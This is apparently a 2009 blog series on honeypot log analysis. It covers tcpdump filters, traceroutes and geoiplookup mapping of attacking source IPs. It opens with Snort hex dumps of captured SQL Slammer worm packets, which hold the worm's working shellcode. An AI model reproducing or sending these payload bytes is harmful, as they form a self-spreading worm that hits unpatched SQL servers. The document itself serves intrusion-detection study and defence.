0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

05/11-20:06:49.515800 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
69.13.200.210:1269 -> 192.168.0.12:1434 UDP TTL:115 TOS:0x20 ID:42723 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 A6 E3 00 00 73 11 D0 C1 45 0D C8 D2 C0 A8  ......s...E.....
0x0020: 00 0C 04 F5 05 9A 01 80 61 C2 04 01 01 01 01 01  ........a.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..


Notice that Snort gives us a full length reading of the packet by default. This verbosity helps enable robust signature creation and detection. (More on that later.) Since the Win32:SQLSlammer worm propagates itself by generating "random IP addresses", the trace routes below may simply lead back to more victims who have unpatched machines or who are botnet victims. Interestingly, several routers actually respond to my traceroute for the private IP address 10.13.3.61:
# traceroute 10.13.8.61
traceroute to 10.13.8.61 (10.13.8.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.405 ms  0.334 ms  0.286 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.558 ms  11.113 ms  12.196 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  10.639 ms  10.806 ms  15.992 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  13.841 ms  15.408 ms  15.311 ms
 6  * * *
 7  * * *
 8  * * *
 9  * * *
10  * * *

# traceroute 202.99.11.99
traceroute to 202.99.11.99 (202.99.11.99), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.496 ms  0.344 ms  0.376 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.941 ms  11.272 ms  15.845 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  24.681 ms  10.952 ms  11.595 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  14.363 ms  19.869 ms  14.247 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.914 ms  14.518 ms  14.792 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  19.672 ms  18.450 ms  19.496 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  32.156 ms  35.483 ms  31.574 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  33.493 ms  33.305 ms  34.754 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.50)  37.252 ms  37.343 ms  37.79 ms
11  75.149.229.42 (75.149.229.42)  36.697 ms  40.34 ms  36.615 ms
12  219.158.29.221 (219.158.29.221)  241.962 ms  242.456 ms  242.522 ms
13  219.158.5.133 (219.158.5.133)  242.769 ms  243.188 ms  242.885 ms
14  219.158.4.57 (219.158.4.57)  249.602 ms  249.813 ms  249.892 ms
15  202.96.12.30 (202.96.12.30)  261.865 ms  261.656 ms  261.901 ms
16  61.148.156.9 (61.148.156.9)  267.504 ms  266.695 ms  266.543 ms
17  61.148.156.166 (61.148.156.166)  267.896 ms  267.840 ms  272.820 ms
18  202.96.13.138 (202.96.13.138)  273.190 ms  272.447 ms  272.802 ms
19  211.154.209.162 (211.154.209.162)  234.590 ms  239.304 ms  234.552 ms
20  202.96.6.74 (202.96.6.74)  263.857 ms  265.102 ms  263.489 ms
21  Sh-Rtr-2-S3/0.sta.net.cn (202.96.6.130)  246.632 ms  255.336 ms  245.572 ms
22  * * *

traceroute to 58.20.222.30 (58.20.222.30), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.352 ms  0.337 ms  0.288 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.935 ms  9.63 ms  9.107 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.516 ms  9.785 ms  9.715 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.484 ms  12.145 ms  11.947 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  14.90 ms  14.66 ms  12.611 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.41 ms  16.51 ms  18.15 ms
 8  pos-1-15-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.197)  29.443 ms  30.459 ms  29.458 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  31.863 ms  31.426 ms  31.794 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  35.808 ms  34.497 ms  35.363 ms
11  75.149.229.42 (75.149.229.42)  34.716 ms  64.27 ms  35.371 ms
12  219.158.29.213 (219.158.29.213)  247.202 ms  245.893 ms  247.260 ms
13  219.158.5.109 (219.158.5.109)  234.699 ms  234.229 ms  233.225 ms
14  219.158.9.102 (219.158.9.102)  239.58 ms  240.322 ms  240.992 ms
15  220.248.160.166 (220.248.160.166)  277.291 ms  275.978 ms  274.375 ms
16  58.20.222.30 (58.20.222.30)  245.299 ms  246.499 ms  245.847 ms

# traceroute -P ICMP 69.13.200.210                                     
traceroute to 69.13.200.210 (69.13.200.210), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  1.198 ms  1.158 ms  1.135 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.636 ms  11.743 ms  8.967 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.764 ms  8.822 ms  9.405 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.576 ms  12.828 ms  11.758 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  13.794 ms  12.422 ms  13.459 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.811 ms  16.782 ms  16.575 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  33.718 ms  28.898 ms  30.359 ms
 9  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  32.74 ms  32.334 ms  33.448 ms
10  er1-tengig3-4.sanjoseequinix.savvis.net (208.173.53.137)  35.790 ms  33.16 ms  32.538 ms
11  * cr1-tenge-0-3-5-0.sanfrancisco.savvis.net (204.70.200.198)  35.756 ms *
12  * * *
13  msr1-tengig0-0-0-0.dallas.savvis.net (204.70.196.202)  80.164 ms  81.798 ms  80.857 ms
14  er1-ge-3-0-6.dallas.savvis.net (204.70.202.61)  78.275 ms  75.309 ms  75.975 ms
15  federal-home-loan.Dallas.savvis.net (208.172.135.2)  76.970 ms  77.282 ms  77.882 ms
16  64.182.192.41 (64.182.192.41)  79.384 ms  79.456 ms  79.130 ms
17  210-200-13-69.cust.propagation.net (69.13.200.210)  76.181 ms  78.84 ms  77.538 ms

# geoiplookup 202.99.11.99 -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
# geoiplookup 58.20.222.30 -f /usr/local/share/GeoIP/GeoLiteCity.dat 
GeoIP City Edition, Rev 1: CN, 11, Changsha, (null), 28.179199, 113.113602, 0, 0
# geoiplookup 69.13.200.210  -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: US, TX, Fort Worth, 76112, 32.749199, -97.220497, 623, 817
# traceroute -P ICMP 69.13.200.210                                     



                                          ..

Monday, May 11, 2009

Where are the SIPs from? Part II

The following sequence of commands and output gives us some idea of what a network security analyst's life was like before the development of Intrusion Prevention Systems. After a laboriously contstructed tcpdump filter,we run this for 36 hours on our dummy/honeypot host. We then have a collections of SIPs sending packets to various ports. Some of these are easily identifiable well known attack ports (ms-sql, telnet, ssh,etc.)

/usr/local/sbin/tcpdump -s 0 -i xl0 -ttt -w out.txt  'port not(domain or whois or http or https or syslog or ntp or smtp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

  
# tcpdump -r out.txt
tcpdump: WARNING: snaplen raised from 96 to 65535
21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]
21:30:08.976883 202.99.11.99.1231 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]
23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
23:40:09.452031 117.0.33.129.3285 > 192.168.0.12.telnet: S 543288824:543288824(0) win 5808 (DF) [tos 0x20]
00:36:06.236501 dynamic.91.192.169.55.vpcit.ru.1076 > 192.168.0.12.38507: udp 30 [tos 0x20]
00:46:25.553206 c-98-242-240-55.hsd1.fl.comcast.net.37443 > 192.168.0.12.ssh: S 3044387924:3044387924(0) win 5840 (DF) [tos 0x20]
01:17:34.032666 213.0.55.130.34982 > 192.168.0.12.38507: udp 31 [tos 0x20]
01:29:12.722357 94.123.212.150.13597 > 192.168.0.12.12712: udp 30 [tos 0x20]
02:17:27.658034 121.15.245.215.12200 > 192.168.0.12.3128: S 484387749:484387749(0) win 8192 (DF) [tos 0x20]
02:33:20.751286 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.387784 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.990932 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:58:36.094717 61.153.26.60.1517 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
03:12:16.084284 222.215.230.49.12200 > 192.168.0.12.8000: S 788992279:788992279(0) win 8192 (DF) [tos 0x20]
03:15:54.079656 222.215.230.49.12200 > 192.168.0.12.3128: S 796332311:796332311(0) win 8192 (DF) [tos 0x20]
03:19:51.292696 221.195.73.68.6000 > 192.168.0.12.7212: S 1454440448:1454440448(0) win 16384 [tos 0x20]
03:19:51.294608 221.195.73.68.6000 > 192.168.0.12.8000: S 798031872:798031872(0) win 16384 [tos 0x20]
04:36:18.268102 210.51.165.30.33386 > 192.168.0.12.ssh: S 1493736546:1493736546(0) win 5840 (DF) [tos 0x20]
05:38:50.224275 static-39-92-224-77.ipcom.comunitel.net.61031 > 192.168.0.12.12712: udp 94 [tos 0x20]
05:55:59.481908 75-165-69-40.tukw.qwest.net.4004 > 192.168.0.12.telnet: S 481811338:481811338(0) win 5840 (DF) [tos 0x20]
06:36:17.744371 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
06:36:18.500456 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
07:20:05.328165 8.63.191.61.broad.static.hf.ah.cndata.com.6000 > 192.168.0.12.2967: S 1176764416:1176764416(0) win 16384 [tos 0x20]

....

After some awkward awk statements, we have the SIP list ready for processing by geoiplookup LiteCity database:

tcpdump -r out.txt | awk -F">" '{print $1}' | awk -F" " '{print $2}' | awk -F"." '{print $1"."$2"."$3"."$4}' >> out_IP.txt 
for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i -f /usr/local/share/GeoIP/GeoLiteCity.dat`; done 

218.7.164.30 : GeoIP City Edition, Rev 1: CN, 08, Suihua, (null), 46.640598, 126.996902, 0, 0
202.99.11.99 : GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
catv-86-101-50-119.catv.broadband.hu : GeoIP City Edition, Rev 1: HU, 23, Veszprém, (null), 47.099998, 17.916700, 0, 0
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
10.13.3.61 : GeoIP City Edition, Rev 1: IP Address not found
117.0.33.129 : GeoIP City Edition, Rev 1: VN, 44, Hanoi, (null), 21.033300, 105.849998, 0, 0
dynamic.91.192.169 : GeoIP City Edition, Rev 1: can't resolve hostname ( dynamic.91.192.169 )
c-98-242-240-55.hsd1.fl.comcast : GeoIP City Edition, Rev 1: can't resolve hostname ( c-98-242-240-55.hsd1.fl.comcast )
....

But let us suppose we want to track only connections from the United States:

for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i` | grep 'United States'; done   

75-165-69-40.tukw.qwest.net : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
8.63.191.61 : GeoIP Country Edition: US, United States
173.1.171.82 : GeoIP Country Edition: US, United States
12.4.209.243 : GeoIP Country Edition: US, United States
208-110-155-97.customer.csolutions.net : GeoIP Country Edition: US, United States

Traceroutes to particular IPs are notoriously useless:

# traceroute  8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  1.179 ms  1.153 ms  1.143 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.692 ms  9.661 ms  9.477 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.541 ms  11.897 ms  10.621 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.404 ms  13.245 ms  13.285 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.652 ms  12.481 ms  13.850 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  15.77 ms  13.320 ms  13.734 ms
 8  * * *
 9  * * *
10  * * *
11  * * *
^C
# traceroute  -P ICMP 8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.460 ms  0.328 ms  0.289 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  12.610 ms  8.716 ms  8.629 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.434 ms  8.360 ms  13.671 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.748 ms  11.914 ms  11.173 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  19.632 ms  13.667 ms  12.556 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  14.819 ms  13.441 ms  13.465 ms
 8  * * *
 9  * * *
10  * *

So now we have spent quite a bit of time extracting data for just one day's worth of activity. Obviously what is needed is a more comprehensive approach: real-time alerting, database, web-based information, long-term analysis and mapping.  This is what you buy with your Intrusion Prevention System...

Friday, May 8, 2009

Where are the SIPs from?

The geoiplookup utility is very helpful in assessing the country where the SIPs (Source Internet Protocol Address) are from. We might be able to say 'hackers' instead of SIPs, if it were ultimately possible to deduce from a SIP the originators of an attack on any given Firewall. And that is important to remember: IPs can be spoofed, the country of origin tells you nothing about the operator themselves, criminals and nation-states terrorists can be leased. So withhold judgement based on IP!!

However,if I log to a file a tcpdump something like this:

/usr/local/sbin/tcpdump -s 0 -i xl0 -n -tt 'port not(ssh or domain or whois or http or https or syslog or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

My dummy/honeypot host receives about 100 or so entries per day from foreign IPs that look like this:

1241804920.098123 IP 85.249.160.55.1225 > 192.168.0.12.38507: UDP, length 20
1241805774.527866 IP 201.67.52.249.59649 > 192.168.0.12.12712: UDP, length 21
1241806316.686063 IP 218.6.12.230.6000 > 192.168.0.12.2967: Flags [S], seq 114163712, win 16384, length 0
1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376
1241807555.257870 IP 91.150.223.226.1519 > 192.168.0.12.38507: UDP, length 63
1241813077.431641 IP 98.247.212.4.1980 > 192.168.0.12.23: Flags [SEW], seq 1693462630, win 5840, options [mss 1460,sackOK,TS val 117815450 ecr 0,nop,wscale 0], length 0
...

The syslog entries that my Netgear FVS318 firewall is forwarding to my OpenBSD dummy/honeypot host contain similar attacks but many more legitimate connection attempts like this:

May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46166]:portforward forwarded , SIP:68.87.69.146: 53, DIP:98.247.182.78: 17337, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46169]:portforward forwarded , SIP:76.96.30.119: 110, DIP:98.247.182.78: 17681,

I can get an excellent approximation of those IPs whose port attempts simply can be easily counted as part of any possibly normal connectivity by subtracting (as above in the tcpdump filters) those SIP ports that are not mail, whois, dns, http, ntp, etc. :

grep -f file1 syslog | grep -v -f file2 | awk -F":" '{print $5}' | sort | uniq >> out.txt

where file1 is:
Hacker
Blocked

and file2 is:
25,
43,
53,
80,
110,
123,
587,

As the astute reader will point, this technique completely neglects hacking attacks from legitimate ports! And also much legitimate traffic comes over port 443 (ssl) which I have excluded here.(Of course, that is what an IDS is for... Much more on that later...) The next step in my investigation is lookup the country of origin for the IP. Batching whois queries are frowned upon. GeoIPLookup fills this need:

for i in `cat out.txt`; do echo $i:`geoiplookup $i`;done;          

10.13.3.61:GeoIP Country Edition: IP Address not found
113.56.251.166:GeoIP Country Edition: CN, China
115.132.83.188:GeoIP Country Edition: MY, Malaysia
116.3.98.197:GeoIP Country Edition: CN, China
116.54.196.108:GeoIP Country Edition: CN, China
117.127.93.18:GeoIP Country Edition: CN, China
118.100.85.190:GeoIP Country Edition: MY, Malaysia
118.22.208.254:GeoIP Country Edition: JP, Japan
....

Hacking is an international activity. It is nice to be silently stalked by so many foreign countries!

for i in `cat out.txt`; do geoiplookup $i >> geoiplookup.txt ;done;
cat geoiplookup.txt | sort | uniq -c | sort -r

  55 GeoIP Country Edition: CN, China
  20 GeoIP Country Edition: US, United States
  10 GeoIP Country Edition: RU, Russian Federation
  10 GeoIP Country Edition: BR, Brazil
   8 GeoIP Country Edition: UA, Ukraine
   5 GeoIP Country Edition: VN, Vietnam
   4 GeoIP Country Edition: MY, Malaysia
   4 GeoIP Country Edition: KR, Korea, Republic of
   4 GeoIP Country Edition: IT, Italy
   3 GeoIP Country Edition: FR, France
   2 GeoIP Country Edition: TR, Turkey
   2 GeoIP Country Edition: JP, Japan
   2 GeoIP Country Edition: GB, United Kingdom
   2 GeoIP Country Edition: DE, Germany
   2 GeoIP Country Edition: CA, Canada
   1 GeoIP Country Edition: ZA, South Africa
   1 GeoIP Country Edition: VE, Venezuela
   1 GeoIP Country Edition: UY, Uruguay
   1 GeoIP Country Edition: TW, Taiwan
   1 GeoIP Country Edition: TH, Thailand
   1 GeoIP Country Edition: SI, Slovenia
   1 GeoIP Country Edition: SE, Sweden
   1 GeoIP Country Edition: QA, Qatar
   1 GeoIP Country Edition: PL, Poland
   1 GeoIP Country Edition: PH, Philippines
   1 GeoIP Country Edition: PA, Panama
   1 GeoIP Country Edition: NZ, New Zealand
   1 GeoIP Country Edition: NO, Norway
   1 GeoIP Country Edition: MX, Mexico
   1 GeoIP Country Edition: MD, Moldova, Republic of
   1 GeoIP Country Edition: JM, Jamaica
   1 GeoIP Country Edition: IP Address not found
   1 GeoIP Country Edition: IN, India
   1 GeoIP Country Edition: HK, Hong Kong
   1 GeoIP Country Edition: FI, Finland
   1 GeoIP Country Edition: EG, Egypt
   1 GeoIP Country Edition: CO, Colombia

What of "IP Address not found"!? (Another question to resolve..) However, let us suppose we are just interested the U.S. connections. Keep in mind some of these are legitimate ssl (443) connections.

# for i in `cat out.txt`; do echo $i:` geoiplookup $i` | grep "United States";done; 

152.26.20.72:GeoIP Country Edition: US, United States
168.75.65.98:GeoIP Country Edition: US, United States
173.1.171.82:GeoIP Country Edition: US, United States
173.69.171.116:GeoIP Country Edition: US, United States
173.8.113.195:GeoIP Country Edition: US, United States
205.214.57.202:GeoIP Country Edition: US, United States
208.111.159.155:GeoIP Country Edition: US, United States
209.85.201.125:GeoIP Country Edition: US, United States
63.226.235.106:GeoIP Country Edition: US, United States
63.231.190.174:GeoIP Country Edition: US, United States
64.251.8.230:GeoIP Country Edition: US, United States
66.35.46.195:GeoIP Country Edition: US, United States
68.142.94.151:GeoIP Country Edition: US, United States
68.37.225.206:GeoIP Country Edition: US, United States
72.42.151.135:GeoIP Country Edition: US, United States
74.63.193.230:GeoIP Country Edition: US, United States
98.220.41.92:GeoIP Country Edition: US, United States
98.247.182.78:GeoIP Country Edition: US, United States
98.247.212.4:GeoIP Country Edition: US, United States
99.152.215.137:GeoIP Country Edition: US, United States

It is useful to see how much information can be gained without packet inspection. next up...tracking SIPs to their networks...